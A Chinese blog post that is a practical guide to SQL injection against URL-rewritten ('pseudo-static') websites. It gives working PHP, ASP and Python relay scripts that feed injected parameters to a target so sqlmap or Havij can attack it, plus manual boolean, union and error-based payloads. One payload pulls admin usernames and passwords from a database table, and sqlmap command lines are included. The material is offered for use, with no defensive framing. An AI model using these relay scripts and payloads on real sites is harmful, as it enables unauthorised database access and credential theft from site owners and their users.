• 伪静态注入的总结


    一:中转注入法

    1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了

    http://www.xxx.com/news.php/id/1.html

    2.测试步骤:

    中转注入的php代码:inject.php

    <?php
    set_time_limit(0);
    $id=$_GET["id"];
    $id=str_replace(” “,”%20″,$id);
    $id=str_replace(“=”,”%3D”,$id);
    //$url = "http://www.xxx.com/news.php/id/$id.html";
    $url = "http://www.xxx.com/news.php/id/$id.html";
    //echo $url;
     
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
     
    $output = curl_exec($ch);
    curl_close($ch);
    print_r($output);
    ?>

    3.本地环境搭建PHP,然后访问http://127.0.0.1/inject.php?id=1

    通过sqlmap或者havj可以跑注入漏洞。

    附录ASP中转代码:

    <strong><font style="font-size: 12pt"><code id="code1"><%
    JmdcwName=request("id")
    JmStr=JmdcwName
    JmStr=URLEncoding(JmStr)
    JMUrl="http://192.168.235.7:8808/ad/blog/"&nbsp;&nbsp;//实际上要请求的网址
    JMUrl=JMUrl & JmStr&".html"&nbsp; &nbsp; //拼接url
    response.write JMUrl&JmStr&nbsp; &nbsp; //我这里故意输出url来看
    'JmRef="http://127.0.0.1/6kbbs/bank.asp"
    JmCok=""
    JmCok=replace(JmCok,chr(32),"%20") 
    JmStr=URLEncoding(JmStr)&nbsp;&nbsp;
    
    response.write&nbsp;&nbsp;PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段
    
    Function PostData(PostUrl,PostStr,PostCok,PostRef)&nbsp;&nbsp;
    Dim Http
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
    With Http
    .Open "GET",PostUrl,False
    .Send ()
    PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData =bytes2BSTR(PostData)
    End Function
    
    
    Function bytes2BSTR(vIn)&nbsp; &nbsp;//处理返回的信息
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
    ThisCharCode = AscB(MidB(vIn, I, 1))
    If ThisCharCode < &H80 Then
    strReturn = strReturn & Chr(ThisCharCode)
    Else
    NextCharCode = AscB(MidB(vIn, I + 1, 1))
    strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
    I = I + 1
    End If
    Next
    bytes2BSTR = strReturn
    End Function
    
    Function URLEncoding(vstrin)&nbsp; &nbsp; //发包前对参数的url编码一下
    strReturn=""
    Dim i
    'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符,
    'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
    'vstrin=Replace(vstrin,chr(43),"%2B")&nbsp;&nbsp;'JMDCW增加转换+字符
    vstrin=Replace(vstrin,chr(32),"/**/")&nbsp;&nbsp;'在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的
    For i=1 To Len(vstrin)
    ThisChr=Mid(vstrin,i,1)
    if Abs(Asc(ThisChr))< &HFF Then
    strReturn=strReturn & ThisChr
    Else
    InnerCode=Asc(ThisChr)
    If InnerCode<0 Then
    InnerCode=InnerCode + &H10000
    End If
    Hight1=(InnerCode And &HFF00) &HFF
    Low1=InnerCode And &HFF
    strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
    End if
    Next
    URLEncoding=strReturn
    End Function
    
    %></code></font></strong>

    二、手工注入法

    1.http://www.xxx.com/play/Diablo.html

    http://www.xxx.com/down/html/?772.html

    2.测试注入:

    http://www.xxx.com/down/html/?772′.html

    http://www.xxx.com /play/Diablo'.html

    http://www.xxx.com/play/Diablo'/**/and
    /**/1='1 /*.html

    http://www.xxx.com/play/Diablo'
    /**/and
    /**/1='2 /*.html

    http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常

    http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错

    3.看页面是否存在差异,相同则不存在,不同存在注入。

    4.联合查询:

    http://www.xxx.com/play/diablo’ and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html

    http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

    三、手工注入法(二)

    http://www.xxx.net/news/html/?410.html

    http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

    注:

    伪静态的注入和URL的普通GET注入不太相同
    。普通urlget注入的%20,%23,+等都可以用;但是伪静态不行,会被直接传递到到url中,所以用/**/这个注释符号表示空格。

    三、SQLmap方法

    sqlmap中伪静态哪儿存在注入点就加*

    http://www.cunlide.com/id1/1/id2/2
    python   sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″

    http://www.xxx.com/news/class/?103.htm

    python  sqlmap.py -u  “http://www.xxx.com/news/class/?103*.html”


    四、python脚本方法

    代码一:

     1 <code id="code3">from BaseHTTPServer import *
     2 import urllib2
     3 class MyHTTPHandler(BaseHTTPRequestHandler):
     4     def do_GET(self):
     5         path=self.path
     6         path=path[path.find('id=')+3:]
     7         proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})
     8         opener = urllib2.build_opener(proxy_support)
     9         urllib2.install_opener(opener)
    10         url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"
    11         try:
    12             response=urllib2.urlopen(url+path)
    13             html=response.read()
    14         except urllib2.URLError,e:
    15             html=e.read()
    16         self.wfile.write(html)
    17 server = HTTPServer(("", 8000), MyHTTPHandler)
    18 server.serve_forever()</code>
  • 相关阅读:
    jsp用equals判断两个字符串变量是否相等
    使用session在jsp页面之间传递多维数组,用于实现全局变量的效果
    C++实现对MySQL数据库的连接,以及增删改查
    VS2017项目中使用代码连接MySQL数据库,以及进行数据添加
    VS2017中遇到不存在从string到const char*的转换函数的解决方法
    windows系统转linux系统后磁盘的处理
    redis集群节点重启后恢复
    Jenkins 与Docker/Kubernetes的自动化CI流水(笔记)
    shell的运用 : jenkins 编译 打包前端发布 生产(tomcat)
    云服务器linux系统修改时间和时区
  • 原文地址:https://www.cnblogs.com/jsq16/p/5942003.html
Copyright © 2020-2023  润新知